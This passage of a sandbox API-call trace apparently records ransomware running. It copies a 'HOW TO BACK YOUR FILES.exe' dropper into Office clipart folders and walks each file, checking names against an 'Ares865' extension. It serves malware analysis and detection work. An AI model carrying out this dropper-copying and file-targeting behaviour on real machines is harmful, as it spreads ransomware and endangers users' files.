lpNewFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.211] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x56406370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5dbd2020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dbd2020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.211] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.211] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.212] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143743.GIF" | out: lpString1="J0143743.GIF") returned="J0143743.GIF" [0074.212] lstrlenW (lpString="J0143743.GIF") returned 12 [0074.212] lstrlenW (lpString="Ares865") returned 7 [0074.212] lstrcmpiW (lpString1="743.GIF", lpString2="Ares865") returned -1 [0074.212] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143744.GIF" | out: lpString1="J0143744.GIF") returned="J0143744.GIF" [0074.212] lstrlenW (lpString="J0143744.GIF") returned 12 [0074.212] lstrlenW (lpString="Ares865") returned 7 [0074.212] lstrcmpiW (lpString1="744.GIF", lpString2="Ares865") returned -1 [0074.212] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143745.GIF" | out: lpString1="J0143745.GIF") returned="J0143745.GIF" [0074.212] lstrlenW (lpString="J0143745.GIF") returned 12 [0074.212] lstrlenW (lpString="Ares865") returned 7 [0074.212] lstrcmpiW (lpString1="745.GIF", lpString2="Ares865") returned -1 [0074.212] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143746.GIF" | out: lpString1="J0143746.GIF") returned="J0143746.GIF" [0074.212] lstrlenW (lpString="J0143746.GIF") returned 12 [0074.212] lstrlenW (lpString="Ares865") returned 7 [0074.212] lstrcmpiW (lpString1="746.GIF", lpString2="Ares865") returned -1 [0074.212] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143748.GIF" | out: lpString1="J0143748.GIF") returned="J0143748.GIF" [0074.212] lstrlenW (lpString="J0143748.GIF") returned 12 [0074.212] lstrlenW (lpString="Ares865") returned 7 [0074.212] lstrcmpiW (lpString1="748.GIF", lpString2="Ares865") returned -1 [0074.212] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143749.GIF" | out: lpString1="J0143749.GIF") returned="J0143749.GIF" [0074.212] lstrlenW (lpString="J0143749.GIF") returned 12 [0074.212] lstrlenW (lpString="Ares865") returned 7 [0074.213] lstrcmpiW (lpString1="749.GIF", lpString2="Ares865") returned -1 [0074.213] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143750.GIF" | out: lpString1="J0143750.GIF") returned="J0143750.GIF" [0074.213] lstrlenW (lpString="J0143750.GIF") returned 12 [0074.213] lstrlenW (lpString="Ares865") returned 7 [0074.213] lstrcmpiW (lpString1="750.GIF", lpString2="Ares865") returned -1 [0074.213] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143752.GIF" | out: lpString1="J0143752.GIF") returned="J0143752.GIF" [0074.213] lstrlenW (lpString="J0143752.GIF") returned 12 [0074.213] lstrlenW (lpString="Ares865") returned 7 [0074.213] lstrcmpiW (lpString1="752.GIF", lpString2="Ares865") returned -1 [0074.213] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143753.GIF" | out: lpString1="J0143753.GIF") returned="J0143753.GIF" [0074.213] lstrlenW (lpString="J0143753.GIF") returned 12 [0074.213] lstrlenW (lpString="Ares865") returned 7 [0074.213] lstrcmpiW (lpString1="753.GIF", lpString2="Ares865") returned -1 [0074.213] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143754.GIF" | out: lpString1="J0143754.GIF") returned="J0143754.GIF" [0074.213] lstrlenW (lpString="J0143754.GIF") returned 12 [0074.213] lstrlenW (lpString="Ares865") returned 7 [0074.213] lstrcmpiW (lpString1="754.GIF", lpString2="Ares865") returned -1 [0074.213] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="J0143758.GIF" | out: lpString1="J0143758.GIF") returned="J0143758.GIF" [0074.213] lstrlenW (lpString="J0143758.GIF") returned 12 [0074.213] lstrlenW (lpString="Ares865") returned 7 [0074.213] lstrcmpiW (lpString1="758.GIF", lpString2="Ares865") returned -1 [0074.213] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB00516L.GIF" | out: lpString1="WB00516L.GIF") returned="WB00516L.GIF" [0074.213] lstrlenW (lpString="WB00516L.GIF") returned 12 [0074.213] lstrlenW (lpString="Ares865") returned 7 [0074.214] lstrcmpiW (lpString1="16L.GIF", lpString2="Ares865") returned -1 [0074.214] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB00531L.GIF" | out: lpString1="WB00531L.GIF") returned="WB00531L.GIF" [0074.214] lstrlenW (lpString="WB00531L.GIF") returned 12 [0074.214] lstrlenW (lpString="Ares865") returned 7 [0074.214] lstrcmpiW (lpString1="31L.GIF", lpString2="Ares865") returned -1 [0074.214] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB00673L.GIF" | out: lpString1="WB00673L.GIF") returned="WB00673L.GIF" [0074.214] lstrlenW (lpString="WB00673L.GIF") returned 12 [0074.214] lstrlenW (lpString="Ares865") returned 7 [0074.214] lstrcmpiW (lpString1="73L.GIF", lpString2="Ares865") returned -1 [0074.214] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB00703L.GIF" | out: lpString1="WB00703L.GIF") returned="WB00703L.GIF" [0074.214] lstrlenW (lpString="WB00703L.GIF") returned 12 [0074.214] lstrlenW (lpString="Ares865") returned 7 [0074.214] lstrcmpiW (lpString1="03L.GIF", lpString2="Ares865") returned -1 [0074.214] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB00760L.GIF" | out: lpString1="WB00760L.GIF") returned="WB00760L.GIF" [0074.214] lstrlenW (lpString="WB00760L.GIF") returned 12 [0074.214] lstrlenW (lpString="Ares865") returned 7 [0074.214] lstrcmpiW (lpString1="60L.GIF", lpString2="Ares865") returned -1 [0074.214] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB00780L.GIF" | out: lpString1="WB00780L.GIF") returned="WB00780L.GIF" [0074.214] lstrlenW (lpString="WB00780L.GIF") returned 12 [0074.214] lstrlenW (lpString="Ares865") returned 7 [0074.214] lstrcmpiW (lpString1="80L.GIF", lpString2="Ares865") returned -1 [0074.214] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB01741L.GIF" | out: lpString1="WB01741L.GIF") returned="WB01741L.GIF" [0074.214] lstrlenW (lpString="WB01741L.GIF") returned 12 [0074.215] lstrlenW (lpString="Ares865") returned 7 [0074.215] lstrcmpiW (lpString1="41L.GIF", lpString2="Ares865") returned -1 [0074.215] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02039_.GIF" | out: lpString1="WB02039_.GIF") returned="WB02039_.GIF" [0074.215] lstrlenW (lpString="WB02039_.GIF") returned 12 [0074.215] lstrlenW (lpString="Ares865") returned 7 [0074.215] lstrcmpiW (lpString1="39_.GIF", lpString2="Ares865") returned -1 [0074.215] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02055_.GIF" | out: lpString1="WB02055_.GIF") returned="WB02055_.GIF" [0074.215] lstrlenW (lpString="WB02055_.GIF") returned 12 [0074.215] lstrlenW (lpString="Ares865") returned 7 [0074.215] lstrcmpiW (lpString1="55_.GIF", lpString2="Ares865") returned -1 [0074.215] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02073_.GIF" | out: lpString1="WB02073_.GIF") returned="WB02073_.GIF" [0074.215] lstrlenW (lpString="WB02073_.GIF") returned 12 [0074.215] lstrlenW (lpString="Ares865") returned 7 [0074.215] lstrcmpiW (lpString1="73_.GIF", lpString2="Ares865") returned -1 [0074.215] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02074_.GIF" | out: lpString1="WB02074_.GIF") returned="WB02074_.GIF" [0074.215] lstrlenW (lpString="WB02074_.GIF") returned 12 [0074.215] lstrlenW (lpString="Ares865") returned 7 [0074.215] lstrcmpiW (lpString1="74_.GIF", lpString2="Ares865") returned -1 [0074.215] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02077_.GIF" | out: lpString1="WB02077_.GIF") returned="WB02077_.GIF" [0074.215] lstrlenW (lpString="WB02077_.GIF") returned 12 [0074.215] lstrlenW (lpString="Ares865") returned 7 [0074.215] lstrcmpiW (lpString1="77_.GIF", lpString2="Ares865") returned -1 [0074.215] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02082_.GIF" | out: lpString1="WB02082_.GIF") returned="WB02082_.GIF" [0074.215] lstrlenW (lpString="WB02082_.GIF") returned 12 [0074.216] lstrlenW (lpString="Ares865") returned 7 [0074.216] lstrcmpiW (lpString1="82_.GIF", lpString2="Ares865") returned -1 [0074.216] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02085_.GIF" | out: lpString1="WB02085_.GIF") returned="WB02085_.GIF" [0074.216] lstrlenW (lpString="WB02085_.GIF") returned 12 [0074.216] lstrlenW (lpString="Ares865") returned 7 [0074.216] lstrcmpiW (lpString1="85_.GIF", lpString2="Ares865") returned -1 [0074.216] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02097_.GIF" | out: lpString1="WB02097_.GIF") returned="WB02097_.GIF" [0074.216] lstrlenW (lpString="WB02097_.GIF") returned 12 [0074.216] lstrlenW (lpString="Ares865") returned 7 [0074.216] lstrcmpiW (lpString1="97_.GIF", lpString2="Ares865") returned -1 [0074.216] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02106_.GIF" | out: lpString1="WB02106_.GIF") returned="WB02106_.GIF" [0074.216] lstrlenW (lpString="WB02106_.GIF") returned 12 [0074.216] lstrlenW (lpString="Ares865") returned 7 [0074.216] lstrcmpiW (lpString1="06_.GIF", lpString2="Ares865") returned -1 [0074.216] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02116_.GIF" | out: lpString1="WB02116_.GIF") returned="WB02116_.GIF" [0074.216] lstrlenW (lpString="WB02116_.GIF") returned 12 [0074.216] lstrlenW (lpString="Ares865") returned 7 [0074.216] lstrcmpiW (lpString1="16_.GIF", lpString2="Ares865") returned -1 [0074.216] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02134_.GIF" | out: lpString1="WB02134_.GIF") returned="WB02134_.GIF" [0074.216] lstrlenW (lpString="WB02134_.GIF") returned 12 [0074.216] lstrlenW (lpString="Ares865") returned 7 [0074.216] lstrcmpiW (lpString1="34_.GIF", lpString2="Ares865") returned -1 [0074.216] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02187_.GIF" | out: lpString1="WB02187_.GIF") returned="WB02187_.GIF" [0074.216] lstrlenW (lpString="WB02187_.GIF") returned 12 [0074.217] lstrlenW (lpString="Ares865") returned 7 [0074.217] lstrcmpiW (lpString1="87_.GIF", lpString2="Ares865") returned -1 [0074.217] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02198_.GIF" | out: lpString1="WB02198_.GIF") returned="WB02198_.GIF" [0074.217] lstrlenW (lpString="WB02198_.GIF") returned 12 [0074.217] lstrlenW (lpString="Ares865") returned 7 [0074.217] lstrcmpiW (lpString1="98_.GIF", lpString2="Ares865") returned -1 [0074.217] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02201_.GIF" | out: lpString1="WB02201_.GIF") returned="WB02201_.GIF" [0074.217] lstrlenW (lpString="WB02201_.GIF") returned 12 [0074.217] lstrlenW (lpString="Ares865") returned 7 [0074.217] lstrcmpiW (lpString1="01_.GIF", lpString2="Ares865") returned -1 [0074.217] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02214_.GIF" | out: lpString1="WB02214_.GIF") returned="WB02214_.GIF" [0074.217] lstrlenW (lpString="WB02214_.GIF") returned 12 [0074.217] lstrlenW (lpString="Ares865") returned 7 [0074.217] lstrcmpiW (lpString1="14_.GIF", lpString2="Ares865") returned -1 [0074.217] lstrcpyW (in: lpString1=0x2e2e8e0, lpString2="WB02218_.GIF" | out: lpString1="WB02218_.GIF") returned="WB02218_.GIF" [0074.217] lstrlenW (lpString="WB02218_.GIF") returned 12 [0074.217] lstrlenW (lpString="Ares865") returned 7 [0074.217] lstrcmpiW (lpString1="18_.GIF", lpString2="Ares865") returned -1 [0074.217] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" [0074.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0074.217] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0074.217] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 50 [0074.217] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: lpString1="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" [0074.217] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.218] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\how to back your files.exe"), bFailIfExists=1) returned 1 [0074.223] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.223] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x512f1610, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5dbf8180, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5dbf8180, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0074.223] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.223] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.224] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00004_.GIF" | out: lpString1="AG00004_.GIF") returned="AG00004_.GIF" [0074.224] lstrlenW (lpString="AG00004_.GIF") returned 12 [0074.224] lstrlenW (lpString="Ares865") returned 7 [0074.224] lstrcmpiW (lpString1="04_.GIF", lpString2="Ares865") returned -1 [0074.224] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00011_.GIF" | out: lpString1="AG00011_.GIF") returned="AG00011_.GIF" [0074.224] lstrlenW (lpString="AG00011_.GIF") returned 12 [0074.224] lstrlenW (lpString="Ares865") returned 7 [0074.224] lstrcmpiW (lpString1="11_.GIF", lpString2="Ares865") returned -1 [0074.224] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00021_.GIF" | out: lpString1="AG00021_.GIF") returned="AG00021_.GIF" [0074.224] lstrlenW (lpString="AG00021_.GIF") returned 12 [0074.224] lstrlenW (lpString="Ares865") returned 7 [0074.224] lstrcmpiW (lpString1="21_.GIF", lpString2="Ares865") returned -1 [0074.224] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00037_.GIF" | out: lpString1="AG00037_.GIF") returned="AG00037_.GIF" [0074.224] lstrlenW (lpString="AG00037_.GIF") returned 12 [0074.225] lstrlenW (lpString="Ares865") returned 7 [0074.225] lstrcmpiW (lpString1="37_.GIF", lpString2="Ares865") returned -1 [0074.225] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00038_.GIF" | out: lpString1="AG00038_.GIF") returned="AG00038_.GIF" [0074.225] lstrlenW (lpString="AG00038_.GIF") returned 12 [0074.225] lstrlenW (lpString="Ares865") returned 7 [0074.225] lstrcmpiW (lpString1="38_.GIF", lpString2="Ares865") returned -1 [0074.225] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00040_.GIF" | out: lpString1="AG00040_.GIF") returned="AG00040_.GIF" [0074.225] lstrlenW (lpString="AG00040_.GIF") returned 12 [0074.225] lstrlenW (lpString="Ares865") returned 7 [0074.225] lstrcmpiW (lpString1="40_.GIF", lpString2="Ares865") returned -1 [0074.225] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00052_.GIF" | out: lpString1="AG00052_.GIF") returned="AG00052_.GIF" [0074.225] lstrlenW (lpString="AG00052_.GIF") returned 12 [0074.225] lstrlenW (lpString="Ares865") returned 7 [0074.225] lstrcmpiW (lpString1="52_.GIF", lpString2="Ares865") returned -1 [0074.225] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00057_.GIF" | out: lpString1="AG00057_.GIF") returned="AG00057_.GIF" [0074.225] lstrlenW (lpString="AG00057_.GIF") returned 12 [0074.225] lstrlenW (lpString="Ares865") returned 7 [0074.225] lstrcmpiW (lpString1="57_.GIF", lpString2="Ares865") returned -1 [0074.225] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00090_.GIF" | out: lpString1="AG00090_.GIF") returned="AG00090_.GIF" [0074.225] lstrlenW (lpString="AG00090_.GIF") returned 12 [0074.225] lstrlenW (lpString="Ares865") returned 7 [0074.225] lstrcmpiW (lpString1="90_.GIF", lpString2="Ares865") returned -1 [0074.225] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00092_.GIF" | out: lpString1="AG00092_.GIF") returned="AG00092_.GIF" [0074.225] lstrlenW (lpString="AG00092_.GIF") returned 12 [0074.226] lstrlenW (lpString="Ares865") returned 7 [0074.226] lstrcmpiW (lpString1="92_.GIF", lpString2="Ares865") returned -1 [0074.226] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00103_.GIF" | out: lpString1="AG00103_.GIF") returned="AG00103_.GIF" [0074.226] lstrlenW (lpString="AG00103_.GIF") returned 12 [0074.226] lstrlenW (lpString="Ares865") returned 7 [0074.226] lstrcmpiW (lpString1="03_.GIF", lpString2="Ares865") returned -1 [0074.226] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00120_.GIF" | out: lpString1="AG00120_.GIF") returned="AG00120_.GIF" [0074.226] lstrlenW (lpString="AG00120_.GIF") returned 12 [0074.226] lstrlenW (lpString="Ares865") returned 7 [0074.226] lstrcmpiW (lpString1="20_.GIF", lpString2="Ares865") returned -1 [0074.226] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00126_.GIF" | out: lpString1="AG00126_.GIF") returned="AG00126_.GIF" [0074.226] lstrlenW (lpString="AG00126_.GIF") returned 12 [0074.226] lstrlenW (lpString="Ares865") returned 7 [0074.226] lstrcmpiW (lpString1="26_.GIF", lpString2="Ares865") returned -1 [0074.226] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00129_.GIF" | out: lpString1="AG00129_.GIF") returned="AG00129_.GIF" [0074.226] lstrlenW (lpString="AG00129_.GIF") returned 12 [0074.226] lstrlenW (lpString="Ares865") returned 7 [0074.226] lstrcmpiW (lpString1="29_.GIF", lpString2="Ares865") returned -1 [0074.226] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00130_.GIF" | out: lpString1="AG00130_.GIF") returned="AG00130_.GIF" [0074.226] lstrlenW (lpString="AG00130_.GIF") returned 12 [0074.226] lstrlenW (lpString="Ares865") returned 7 [0074.226] lstrcmpiW (lpString1="30_.GIF", lpString2="Ares865") returned -1 [0074.226] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00135_.GIF" | out: lpString1="AG00135_.GIF") returned="AG00135_.GIF" [0074.226] lstrlenW (lpString="AG00135_.GIF") returned 12 [0074.227] lstrlenW (lpString="Ares865") returned 7 [0074.227] lstrcmpiW (lpString1="35_.GIF", lpString2="Ares865") returned -1 [0074.227] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00139_.GIF" | out: lpString1="AG00139_.GIF") returned="AG00139_.GIF" [0074.227] lstrlenW (lpString="AG00139_.GIF") returned 12 [0074.227] lstrlenW (lpString="Ares865") returned 7 [0074.227] lstrcmpiW (lpString1="39_.GIF", lpString2="Ares865") returned -1 [0074.227] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00142_.GIF" | out: lpString1="AG00142_.GIF") returned="AG00142_.GIF" [0074.227] lstrlenW (lpString="AG00142_.GIF") returned 12 [0074.227] lstrlenW (lpString="Ares865") returned 7 [0074.227] lstrcmpiW (lpString1="42_.GIF", lpString2="Ares865") returned -1 [0074.227] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00154_.GIF" | out: lpString1="AG00154_.GIF") returned="AG00154_.GIF" [0074.227] lstrlenW (lpString="AG00154_.GIF") returned 12 [0074.227] lstrlenW (lpString="Ares865") returned 7 [0074.227] lstrcmpiW (lpString1="54_.GIF", lpString2="Ares865") returned -1 [0074.227] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00157_.GIF" | out: lpString1="AG00157_.GIF") returned="AG00157_.GIF" [0074.227] lstrlenW (lpString="AG00157_.GIF") returned 12 [0074.227] lstrlenW (lpString="Ares865") returned 7 [0074.227] lstrcmpiW (lpString1="57_.GIF", lpString2="Ares865") returned -1 [0074.227] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00158_.GIF" | out: lpString1="AG00158_.GIF") returned="AG00158_.GIF" [0074.227] lstrlenW (lpString="AG00158_.GIF") returned 12 [0074.227] lstrlenW (lpString="Ares865") returned 7 [0074.227] lstrcmpiW (lpString1="58_.GIF", lpString2="Ares865") returned -1 [0074.227] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00160_.GIF" | out: lpString1="AG00160_.GIF") returned="AG00160_.GIF" [0074.227] lstrlenW (lpString="AG00160_.GIF") returned 12 [0074.228] lstrlenW (lpString="Ares865") returned 7 [0074.228] lstrcmpiW (lpString1="60_.GIF", lpString2="Ares865") returned -1 [0074.228] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00161_.GIF" | out: lpString1="AG00161_.GIF") returned="AG00161_.GIF" [0074.228] lstrlenW (lpString="AG00161_.GIF") returned 12 [0074.228] lstrlenW (lpString="Ares865") returned 7 [0074.228] lstrcmpiW (lpString1="61_.GIF", lpString2="Ares865") returned -1 [0074.228] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00163_.GIF" | out: lpString1="AG00163_.GIF") returned="AG00163_.GIF" [0074.228] lstrlenW (lpString="AG00163_.GIF") returned 12 [0074.228] lstrlenW (lpString="Ares865") returned 7 [0074.228] lstrcmpiW (lpString1="63_.GIF", lpString2="Ares865") returned -1 [0074.228] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00164_.GIF" | out: lpString1="AG00164_.GIF") returned="AG00164_.GIF" [0074.228] lstrlenW (lpString="AG00164_.GIF") returned 12 [0074.228] lstrlenW (lpString="Ares865") returned 7 [0074.228] lstrcmpiW (lpString1="64_.GIF", lpString2="Ares865") returned -1 [0074.228] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00165_.GIF" | out: lpString1="AG00165_.GIF") returned="AG00165_.GIF" [0074.228] lstrlenW (lpString="AG00165_.GIF") returned 12 [0074.228] lstrlenW (lpString="Ares865") returned 7 [0074.228] lstrcmpiW (lpString1="65_.GIF", lpString2="Ares865") returned -1 [0074.228] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00167_.GIF" | out: lpString1="AG00167_.GIF") returned="AG00167_.GIF" [0074.228] lstrlenW (lpString="AG00167_.GIF") returned 12 [0074.228] lstrlenW (lpString="Ares865") returned 7 [0074.228] lstrcmpiW (lpString1="67_.GIF", lpString2="Ares865") returned -1 [0074.228] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00169_.GIF" | out: lpString1="AG00169_.GIF") returned="AG00169_.GIF" [0074.228] lstrlenW (lpString="AG00169_.GIF") returned 12 [0074.229] lstrlenW (lpString="Ares865") returned 7 [0074.229] lstrcmpiW (lpString1="69_.GIF", lpString2="Ares865") returned -1 [0074.229] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00170_.GIF" | out: lpString1="AG00170_.GIF") returned="AG00170_.GIF" [0074.229] lstrlenW (lpString="AG00170_.GIF") returned 12 [0074.229] lstrlenW (lpString="Ares865") returned 7 [0074.229] lstrcmpiW (lpString1="70_.GIF", lpString2="Ares865") returned -1 [0074.229] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00171_.GIF" | out: lpString1="AG00171_.GIF") returned="AG00171_.GIF" [0074.229] lstrlenW (lpString="AG00171_.GIF") returned 12 [0074.229] lstrlenW (lpString="Ares865") returned 7 [0074.229] lstrcmpiW (lpString1="71_.GIF", lpString2="Ares865") returned -1 [0074.229] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00172_.GIF" | out: lpString1="AG00172_.GIF") returned="AG00172_.GIF" [0074.229] lstrlenW (lpString="AG00172_.GIF") returned 12 [0074.229] lstrlenW (lpString="Ares865") returned 7 [0074.229] lstrcmpiW (lpString1="72_.GIF", lpString2="Ares865") returned -1 [0074.229] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00174_.GIF" | out: lpString1="AG00174_.GIF") returned="AG00174_.GIF" [0074.229] lstrlenW (lpString="AG00174_.GIF") returned 12 [0074.229] lstrlenW (lpString="Ares865") returned 7 [0074.229] lstrcmpiW (lpString1="74_.GIF", lpString2="Ares865") returned -1 [0074.229] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00175_.GIF" | out: lpString1="AG00175_.GIF") returned="AG00175_.GIF" [0074.229] lstrlenW (lpString="AG00175_.GIF") returned 12 [0074.229] lstrlenW (lpString="Ares865") returned 7 [0074.229] lstrcmpiW (lpString1="75_.GIF", lpString2="Ares865") returned -1 [0074.242] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AG00176_.GIF" | out: lpString1="AG00176_.GIF") returned="AG00176_.GIF" [0074.242] lstrlenW (lpString="AG00176_.GIF") returned 12 [0074.242] lstrlenW (lpString="Ares865") returned 7 [0074.242] lstrcmpiW (lpString1="76_.GIF", lpString2="Ares865") returned -1 [0074.242] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00010_.WMF" | out: lpString1="AN00010_.WMF") returned="AN00010_.WMF" [0074.242] lstrlenW (lpString="AN00010_.WMF") returned 12 [0074.242] lstrlenW (lpString="Ares865") returned 7 [0074.242] lstrcmpiW (lpString1="10_.WMF", lpString2="Ares865") returned -1 [0074.243] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00015_.WMF" | out: lpString1="AN00015_.WMF") returned="AN00015_.WMF" [0074.243] lstrlenW (lpString="AN00015_.WMF") returned 12 [0074.243] lstrlenW (lpString="Ares865") returned 7 [0074.243] lstrcmpiW (lpString1="15_.WMF", lpString2="Ares865") returned -1 [0074.243] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00790_.WMF" | out: lpString1="AN00790_.WMF") returned="AN00790_.WMF" [0074.243] lstrlenW (lpString="AN00790_.WMF") returned 12 [0074.243] lstrlenW (lpString="Ares865") returned 7 [0074.243] lstrcmpiW (lpString1="90_.WMF", lpString2="Ares865") returned -1 [0074.243] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00853_.WMF" | out: lpString1="AN00853_.WMF") returned="AN00853_.WMF" [0074.243] lstrlenW (lpString="AN00853_.WMF") returned 12 [0074.243] lstrlenW (lpString="Ares865") returned 7 [0074.243] lstrcmpiW (lpString1="53_.WMF", lpString2="Ares865") returned -1 [0074.243] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00914_.WMF" | out: lpString1="AN00914_.WMF") returned="AN00914_.WMF" [0074.243] lstrlenW (lpString="AN00914_.WMF") returned 12 [0074.243] lstrlenW (lpString="Ares865") returned 7 [0074.243] lstrcmpiW (lpString1="14_.WMF", lpString2="Ares865") returned -1 [0074.243] lstrcpyW (in: lpString1=0x2e2e8c6, lpString2="AN00932_.WMF" | out: lpString1="AN00932_.WMF") returned="AN00932_.WMF" [0074.243] lstrlenW (lpString="AN00932_.WMF") returned 12 [0074.243] lstrlenW (lpString="Ares865") returned 7 [0074.243] lstrcmpiW (lpString1="32_.WMF", 